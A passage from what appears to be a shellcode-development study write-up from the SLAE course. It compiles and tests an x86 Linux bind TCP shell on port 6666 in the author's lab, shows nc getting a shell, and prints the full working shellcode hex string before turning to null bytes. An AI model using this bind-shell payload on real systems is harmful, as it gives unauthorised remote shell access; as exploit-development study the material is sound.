Let’s try to compile and run the file. For compilation I’ve been using modified scripts from the SLAE course, to ease the many compilation tasks when adjusting the code.
The scripts used are available from my Github page.
Compile ASM
Compiling the .asm file produces the expected .o object file and the linked ELF binary itself. No errors are shown, so compilation was successful.
$ ../compile_asm.sh bind_tcp_initial
[+] Assembling with Nasm ...
[+] Linking ...
[+] Done!
$ ls -ltr
-rw-rw-r-- 1 vbox vbox 4418 Nov 26 07:47 bind_tcp_initial.asm
-rw-rw-r-- 1 vbox vbox 592 Nov 26 07:47 bind_tcp_initial.o
-rwxrwxr-x 1 vbox vbox 673 Nov 26 07:47 bind_tcp_initial
Running the ASM binary
When running the just-compiled binary, it runs as it should: the process stays in the background, and connecting to port 6666 with nc gives a shell.
$ ./bind_tcp_initial &
[1] 2488
$ ps ax | grep 2488
2488 pts/0 S 0:00 ./bind_tcp_initial
$ nc localhost 6666
id
uid=1000(vbox) gid=1000(vbox) groups=1000(vbox),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)
uname -a
Linux study-slae 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
Converting to shellcode for C compilation
The next step is to convert the binary into shellcode for C compilation. This way we can embed the shellcode in a C file for later debugging purposes.
$ ../convert_bin_sc.sh bind_tcp_initial
"\xb8\x66\x00\x00\x00\xbb\x01\x00\x00\x00\x6a\x00\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc2\x6a\x00\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\xb8\x66\x00\x00\x00\xbb\x02\x00\x00\x00\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb8\x66\x00\x00\x00\xbb\x04\x00\x00\x00\x6a\x00\x52\x89\xe1\xcd\x80\xb8\x66\x00\x00\x00\xbb\x05\x00\x00\x00\x6a\x00\x6a\x00\x52\x89\xe1\xcd\x80\x89\xc2\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x00\x00\x00\x00\xcd\x80\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x01\x00\x00\x00\xcd\x80\xb8\x3f\x00\x00\x00\x89\xd3\xb9\x02\x00\x00\x00\xcd\x80\xb8\x0b\x00\x00\x00\x6a\x00\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb9\x00\x00\x00\x00\xba\x00\x00\x00\x00\xcd\x80"
What draws our attention? Null bytes! Because a null byte terminates a C string, any string-based copy of this shellcode would be cut off at the first \x00, and execution would end prematurely.